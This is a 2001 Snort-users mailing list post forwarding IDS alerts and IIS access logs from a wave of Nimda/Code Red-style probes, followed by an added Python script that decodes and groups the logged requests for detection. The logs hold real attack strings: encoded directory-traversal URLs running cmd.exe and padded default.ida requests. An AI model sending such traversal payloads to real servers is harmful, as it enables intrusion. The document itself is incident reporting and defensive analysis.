[Snort-users] WEB-IIS Cmd attack

John Sage jsage at ...2022...
Tue Sep 18 08:34:07 EDT 2001


See the developing threads at:

http://www.incidents.org/archives/intrusions/thrd1.html

Of course, the threads don't post to the archive quite as fast as they 
are happening on the maillist at:

intrusions at ...2034...

See:

http://www.incidents.org/detect/list_info.php


- John

-- 
John Sage
FinchHaven, Vashon Island, WA, USA
http://www.finchhaven.com/
mailto:jsage at ...2022...
"The web is so, like, five minutes ago..."


Togan Muftuoglu wrote:

> Hi,
> 
> Suddenly there is a flood of Web-IIS CM attacks; this is just a tiny bit
> of it.
> 
> Is this a new variant or script kiddies around?
> 
> TIA
> 
> Sep 18 16:50:14 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain   Priority: 8]: 212.209.96.133:2031 -> 212.174.50.248:80
> Sep 18 16:50:14 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain   Priority: 8]: 212.209.96.133:2031 -> 212.174.50.248:80
> Sep 18 16:50:15 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain   Priority: 8]: 212.209.96.133:2109 -> 212.174.50.248:80
> Sep 18 16:50:15 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain   Priority: 8]: 212.209.96.133:2109 -> 212.174.50.248:80
> Sep 18 16:50:16 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain   Priority: 8]: 212.209.96.133:2177 -> 212.174.50.248:80
> Sep 18 16:50:16 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain   Priority: 8]: 212.209.96.133:2177 -> 212.174.50.248:80
> Sep 18 16:50:16 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain   Priority: 8]: 212.209.96.133:2243 -> 212.174.50.248:80
> Sep 18 16:50:16 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain   Priority: 8]: 212.209.96.133:2243 -> 212.174.50.248:80
> Sep 18 16:50:17 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain   Priority: 8]: 212.209.96.133:2294 -> 212.174.50.248:80
> Sep 18 16:50:17 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain   Priority: 8]: 212.209.96.133:2294 -> 212.174.50.248:80
> Sep 18 16:50:18 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain   Priority: 8]: 212.209.96.133:2522 -> 212.174.50.248:80
> Sep 18 16:50:18 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain   Priority: 8]: 212.209.96.133:2522 -> 212.174.50.248:80
> Sep 18 16:50:18 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain   Priority: 8]: 212.209.96.133:2613 -> 212.174.50.248:80
> Sep 18 16:50:18 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain   Priority: 8]: 212.209.96.133:2613 -> 212.174.50.248:80
> Sep 18 16:50:19 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain   Priority: 8]: 212.209.96.133:2673 -> 212.174.50.248:80
> Sep 18 16:50:19 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain   Priority: 8]: 212.209.96.133:2673 -> 212.174.50.248:80
> Sep 18 16:50:20 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain   Priority: 8]: 212.209.96.133:2726 -> 212.174.50.248:80
> Sep 18 16:50:20 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain   Priority: 8]: 212.209.96.133:2726 -> 212.174.50.248:80
> Sep 18 16:50:24 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain   Priority: 8]: 212.209.96.133:2766 -> 212.174.50.248:80
> Sep 18 16:50:24 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain   Priority: 8]: 212.209.96.133:2766 -> 212.174.50.248:80
> Sep 18 16:50:24 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain   Priority: 8]: 212.209.96.133:3155 -> 212.174.50.248:80
> Sep 18 16:50:24 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain   Priority: 8]: 212.209.96.133:3155 -> 212.174.50.248:80
> Sep 18 16:50:25 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain   Priority: 8]: 212.209.96.133:3216 -> 212.174.50.248:80
> Sep 18 16:50:25 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain   Priority: 8]: 212.209.96.133:3216 -> 212.174.50.248:80
> Sep 18 16:50:26 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain   Priority: 8]: 212.209.96.133:3271 -> 212.174.50.248:80
> Sep 18 16:50:26 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain   Priority: 8]: 212.209.96.133:3271 -> 212.174.50.248:80
> Sep 18 16:50:26 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain   Priority: 8]: 212.209.96.133:3317 -> 212.174.50.248:80
> Sep 18 16:50:26 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain   Priority: 8]: 212.209.96.133:3317 -> 212.174.50.248:80
> Sep 18 16:56:00 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain   Priority: 8]: 212.221.24.66:3992 -> 212.174.50.248:80
> Sep 18 16:56:00 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain   Priority: 8]: 212.221.24.66:3992 -> 212.174.50.248:80
> Sep 18 16:56:01 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain   Priority: 8]: 212.221.24.66:4172 -> 212.174.50.248:80
> Sep 18 16:56:01 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain   Priority: 8]: 212.221.24.66:4172 -> 212.174.50.248:80
> Sep 18 16:56:03 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain   Priority: 8]: 212.221.24.66:4291 -> 212.174.50.248:80
> Sep 18 16:56:03 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain   Priority: 8]: 212.221.24.66:4291 -> 212.174.50.248:80
> Sep 18 16:56:05 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain   Priority: 8]: 212.221.24.66:4382 -> 212.174.50.248:80
> Sep 18 16:56:05 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain   Priority: 8]: 212.221.24.66:4382 -> 212.174.50.248:80
> Sep 18 16:56:06 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain   Priority: 8]: 212.221.24.66:4575 -> 212.174.50.248:80
> Sep 18 16:56:06 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain   Priority: 8]: 212.221.24.66:4575 -> 212.174.50.248:80
> Sep 18 16:56:08 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain   Priority: 8]: 212.221.24.66:4674 -> 212.174.50.248:80
> Sep 18 16:56:08 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain   Priority: 8]: 212.221.24.66:4674 -> 212.174.50.248:80
> Sep 18 16:56:10 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain   Priority: 8]: 212.221.24.66:4770 -> 212.174.50.248:80
> Sep 18 16:56:10 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain   Priority: 8]: 212.221.24.66:4770 -> 212.174.50.248:80
> Sep 18 16:56:11 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain   Priority: 8]: 212.221.24.66:4875 -> 212.174.50.248:80
> Sep 18 16:56:11 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain   Priority: 8]: 212.221.24.66:4875 -> 212.174.50.248:80
> Sep 18 16:56:15 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain   Priority: 8]: 212.221.24.66:1137 -> 212.174.50.248:80
> Sep 18 16:56:15 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain   Priority: 8]: 212.221.24.66:1137 -> 212.174.50.248:80
> Sep 18 16:56:17 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain   Priority: 8]: 212.221.24.66:1483 -> 212.174.50.248:80
> Sep 18 16:56:17 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain   Priority: 8]: 212.221.24.66:1483 -> 212.174.50.248:80
> Sep 18 16:56:19 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain   Priority: 8]: 212.221.24.66:1616 -> 212.174.50.248:80
> Sep 18 16:56:19 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain   Priority: 8]: 212.221.24.66:1616 -> 212.174.50.248:80
> Sep 18 16:56:21 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain   Priority: 8]: 212.221.24.66:1789 -> 212.174.50.248:80
> Sep 18 16:56:21 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain   Priority: 8]: 212.221.24.66:1789 -> 212.174.50.248:80
> Sep 18 16:56:23 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain   Priority: 8]: 212.221.24.66:2014 -> 212.174.50.248:80
> Sep 18 16:56:23 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain   Priority: 8]: 212.221.24.66:2014 -> 212.174.50.248:80
> Sep 18 16:56:24 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain   Priority: 8]: 212.221.24.66:2099 -> 212.174.50.248:80
> Sep 18 16:56:24 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain   Priority: 8]: 212.221.24.66:2099 -> 212.174.50.248:80
> Sep 18 16:57:29 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain   Priority: 8]: 212.174.230.34:2606 -> 212.174.50.248:80
> Sep 18 16:57:29 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain   Priority: 8]: 212.174.230.34:2606 -> 212.174.50.248:80
> Sep 18 16:57:29 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain   Priority: 8]: 212.174.230.34:2649 -> 212.174.50.248:80
> Sep 18 16:57:29 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain   Priority: 8]: 212.174.230.34:2649 -> 212.174.50.248:80
> Sep 18 16:57:30 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain   Priority: 8]: 212.174.230.34:2672 -> 212.174.50.248:80
> Sep 18 16:57:30 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain   Priority: 8]: 212.174.230.34:2672 -> 212.174.50.248:80
> Sep 18 16:57:31 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain   Priority: 8]: 212.174.230.34:2702 -> 212.174.50.248:80
> Sep 18 16:57:31 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain   Priority: 8]: 212.174.230.34:2702 -> 212.174.50.248:80
> Sep 18 16:57:34 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain   Priority: 8]: 212.174.230.34:2729 -> 212.174.50.248:80
> Sep 18 16:57:34 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain   Priority: 8]: 212.174.230.34:2729 -> 212.174.50.248:80
> Sep 18 16:57:41 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain   Priority: 8]: 212.174.230.34:3041 -> 212.174.50.248:80
> Sep 18 16:57:41 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain   Priority: 8]: 212.174.230.34:3041 -> 212.174.50.248:80
> Sep 18 16:57:45 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain   Priority: 8]: 212.174.230.34:3202 -> 212.174.50.248:80
> Sep 18 16:57:45 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain   Priority: 8]: 212.174.230.34:3202 -> 212.174.50.248:80
> Sep 18 16:57:45 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain   Priority: 8]: 212.174.230.34:3379 -> 212.174.50.248:80
> Sep 18 16:57:45 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain   Priority: 8]: 212.174.230.34:3379 -> 212.174.50.248:80
> Sep 18 16:57:46 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain   Priority: 8]: 212.174.230.34:3402 -> 212.174.50.248:80
> Sep 18 16:57:46 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain   Priority: 8]: 212.174.230.34:3402 -> 212.174.50.248:80
> Sep 18 16:57:49 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain   Priority: 8]: 212.174.230.34:3417 -> 212.174.50.248:80
> Sep 18 16:57:49 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain   Priority: 8]: 212.174.230.34:3417 -> 212.174.50.248:80
> Sep 18 16:57:50 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain   Priority: 8]: 212.174.230.34:3594 -> 212.174.50.248:80
> Sep 18 16:57:50 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain   Priority: 8]: 212.174.230.34:3594 -> 212.174.50.248:80
> Sep 18 16:57:50 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain   Priority: 8]: 212.174.230.34:3617 -> 212.174.50.248:80
> Sep 18 16:57:50 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain   Priority: 8]: 212.174.230.34:3617 -> 212.174.50.248:80
> Sep 18 16:57:51 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain   Priority: 8]: 212.174.230.34:3638 -> 212.174.50.248:80
> Sep 18 16:57:51 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain   Priority: 8]: 212.174.230.34:3638 -> 212.174.50.248:80
> Sep 18 16:57:51 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain   Priority: 8]: 212.174.230.34:3661 -> 212.174.50.248:80
> Sep 18 16:57:51 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain   Priority: 8]: 212.174.230.34:3661 -> 212.174.50.248:80
> Sep 18 16:59:16 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain   Priority: 8]: 212.174.113.99:4917 -> 212.174.50.248:80
> 
> 
> ::ffff:212.209.96.133%134580160 - - [18/Sep/2001:16:50:12 +0300] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 - "" ""
> ::ffff:212.209.96.133%134595336 - - [18/Sep/2001:16:50:13 +0300] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 - "" ""
> ::ffff:212.209.96.133%134595336 - - [18/Sep/2001:16:50:14 +0300] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" ""
> ::ffff:212.209.96.133%134595336 - - [18/Sep/2001:16:50:15 +0300] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" ""
> ::ffff:212.209.96.133%134595336 - - [18/Sep/2001:16:50:16 +0300] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" ""
> ::ffff:212.209.96.133%134595336 - - [18/Sep/2001:16:50:16 +0300] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" ""
> ::ffff:212.209.96.133%134595336 - - [18/Sep/2001:16:50:17 +0300] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" ""
> ::ffff:212.209.96.133%134595336 - - [18/Sep/2001:16:50:18 +0300] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" ""
> ::ffff:212.209.96.133%134595336 - - [18/Sep/2001:16:50:18 +0300] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" ""
> ::ffff:212.209.96.133%134595336 - - [18/Sep/2001:16:50:19 +0300] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" ""
> ::ffff:212.209.96.133%134595336 - - [18/Sep/2001:16:50:20 +0300] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" ""
> ::ffff:212.209.96.133%134595336 - - [18/Sep/2001:16:50:24 +0300] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" ""
> ::ffff:212.209.96.133%134595336 - - [18/Sep/2001:16:50:24 +0300] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" ""
> ::ffff:212.209.96.133%134595336 - - [18/Sep/2001:16:50:25 +0300] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" ""
> ::ffff:212.209.96.133%134595336 - - [18/Sep/2001:16:50:26 +0300] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" ""
> ::ffff:212.209.96.133%134595336 - - [18/Sep/2001:16:50:26 +0300] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" ""
> ::ffff:212.174.147.6%134595336 - - [18/Sep/2001:16:50:59 +0300] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX HTTP/1.0" 404 - "" ""
> ::ffff:212.221.24.66 - - [18/Sep/2001:16:55:56 +0300] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 - "" ""
> ::ffff:212.221.24.66%134595336 - - [18/Sep/2001:16:55:58 +0300] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 - "" ""
> ::ffff:212.221.24.66%134595336 - - [18/Sep/2001:16:56:00 +0300] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" ""
> ::ffff:212.221.24.66%134595336 - - [18/Sep/2001:16:56:01 +0300] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" ""
> ::ffff:212.221.24.66%134595336 - - [18/Sep/2001:16:56:03 +0300] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" ""
> ::ffff:212.221.24.66%134595336 - - [18/Sep/2001:16:56:05 +0300] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" ""
> ::ffff:212.221.24.66%134595336 - - [18/Sep/2001:16:56:06 +0300] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" ""
> ::ffff:212.221.24.66%134595336 - - [18/Sep/2001:16:56:08 +0300] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" ""
> ::ffff:212.221.24.66%134595336 - - [18/Sep/2001:16:56:10 +0300] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" ""
> ::ffff:212.221.24.66%134595336 - - [18/Sep/2001:16:56:11 +0300] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" ""
> ::ffff:212.221.24.66%134595336 - - [18/Sep/2001:16:56:15 +0300] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" ""
> ::ffff:212.221.24.66%134595336 - - [18/Sep/2001:16:56:17 +0300] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" ""
> ::ffff:212.221.24.66%134595336 - - [18/Sep/2001:16:56:19 +0300] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" ""
> ::ffff:212.221.24.66%134595336 - - [18/Sep/2001:16:56:21 +0300] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" ""
> ::ffff:212.221.24.66%134595336 - - [18/Sep/2001:16:56:23 +0300] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" ""
> ::ffff:212.221.24.66%134595336 - - [18/Sep/2001:16:56:24 +0300] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" ""
> ::ffff:212.174.230.34 - - [18/Sep/2001:16:57:24 +0300] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 - "" ""
> ::ffff:212.174.230.34%134595336 - - [18/Sep/2001:16:57:25 +0300] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 - "" ""
> ::ffff:212.174.230.34%134595336 - - [18/Sep/2001:16:57:29 +0300] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" ""
> ::ffff:212.174.230.34%134595336 - - [18/Sep/2001:16:57:29 +0300] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" ""
> ::ffff:212.174.230.34%134595336 - - [18/Sep/2001:16:57:30 +0300] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" ""
> ::ffff:212.174.230.34%134595336 - - [18/Sep/2001:16:57:31 +0300] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" ""
> ::ffff:212.174.230.34%134595336 - - [18/Sep/2001:16:57:34 +0300] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" ""
> ::ffff:212.174.230.34%134595336 - - [18/Sep/2001:16:57:41 +0300] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" ""
> ::ffff:212.174.230.34%134595336 - - [18/Sep/2001:16:57:45 +0300] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" ""
> ::ffff:212.174.230.34%134595336 - - [18/Sep/2001:16:57:45 +0300] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" ""
> ::ffff:212.174.230.34%134595336 - - [18/Sep/2001:16:57:46 +0300] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" ""
> ::ffff:212.174.230.34%134595336 - - [18/Sep/2001:16:57:49 +0300] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" ""
> ::ffff:212.174.230.34%134595336 - - [18/Sep/2001:16:57:50 +0300] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" ""
> ::ffff:212.174.230.34%134595336 - - [18/Sep/2001:16:57:50 +0300] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" ""
> ::ffff:212.174.230.34%134595336 - - [18/Sep/2001:16:57:51 +0300] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" ""
> ::ffff:212.174.230.34%134595336 - - [18/Sep/2001:16:57:51 +0300] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" ""
> ::ffff:212.174.113.99 - - [18/Sep/2001:16:59:16 +0300] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX HTTP/1.0" 404 - "" ""
> 
> ----- End forwarded message -----
> 
> 
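The following is an added example, not part of either message: it parses access-log lines in the format quoted above, percent-decodes each request path repeatedly to expose layered encodings such as `..%255c..` and `..%%35%63..`, and groups sources that sent the same ordered sequence of request types, which is one way to tell a single automated tool from unrelated manual probing. The labels and function names are assumptions made for this example, not Snort classifications.

```python
import re
from collections import defaultdict
from urllib.parse import unquote

# Subset of the access-log lines quoted above; default.ida query shortened.
SAMPLE_LOG = r'''
::ffff:212.209.96.133%134580160 - - [18/Sep/2001:16:50:12 +0300] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 - "" ""
::ffff:212.209.96.133%134595336 - - [18/Sep/2001:16:50:16 +0300] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" ""
::ffff:212.209.96.133%134595336 - - [18/Sep/2001:16:50:20 +0300] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" ""
::ffff:212.209.96.133%134595336 - - [18/Sep/2001:16:50:24 +0300] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" ""
::ffff:212.221.24.66 - - [18/Sep/2001:16:55:56 +0300] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 - "" ""
::ffff:212.221.24.66%134595336 - - [18/Sep/2001:16:56:03 +0300] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" ""
::ffff:212.221.24.66%134595336 - - [18/Sep/2001:16:56:15 +0300] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" ""
::ffff:212.221.24.66%134595336 - - [18/Sep/2001:16:56:19 +0300] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" ""
::ffff:212.174.113.99 - - [18/Sep/2001:16:59:16 +0300] "GET /default.ida?XXXXXXXX HTTP/1.0" 404 - "" ""
'''

LINE_RE = re.compile(
    r'^(?:::ffff:)?(?P<src>\d+(?:\.\d+){3})(?:%\d+)? \S+ \S+ \[[^\]]+\] '
    r'"\S+ (?P<uri>\S+) [^"]*" \d{3}')
SUFFIX_LABELS = (('/root.exe', 'root.exe-probe'), ('/cmd.exe', 'cmd.exe-direct'),
                 ('.ida', 'default.ida-request'))

def fully_decode(path, max_rounds=5):
    """Percent-decode until the text stops changing; return (text, rounds)."""
    for rounds in range(max_rounds):
        decoded = unquote(path, encoding='latin-1')
        if decoded == path:
            return path, rounds
        path = decoded
    return path, max_rounds

def classify(uri):
    """Label one request URI by the probing technique it shows."""
    path = uri.split('?', 1)[0].lower()
    decoded, rounds = fully_decode(path)
    # 0xC0 and 0xC1 never occur in valid UTF-8, so %c0/%c1 marks a bogus encoding.
    if re.search(r'%c[01]%[0-9a-f]{2}', path):
        return 'invalid-utf8-traversal'
    if rounds >= 2 and re.search(r'\.\.[\\/]', decoded):
        return 'double-encoded-traversal'
    for suffix, label in SUFFIX_LABELS:
        if path.endswith(suffix):
            return label
    return 'other'

def sequences_by_source(log_text):
    """Map each source IP to the ordered tuple of request labels it sent."""
    seqs = defaultdict(list)
    for line in log_text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            seqs[m['src']].append(classify(m['uri']))
    return {src: tuple(seq) for src, seq in seqs.items()}

def shared_sequences(log_text, min_sources=2):
    """Return {sequence: [sources]} for sequences sent by several sources."""
    groups = defaultdict(list)
    for src, seq in sequences_by_source(log_text).items():
        groups[seq].append(src)
    return {s: sorted(v) for s, v in groups.items() if len(v) >= min_sources}

if __name__ == '__main__':
    print(shared_sequences(SAMPLE_LOG))
```

Decoding only once would leave `..%5c..` in the path and miss the traversal, which is why the classifier decodes to a fixed point before matching.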





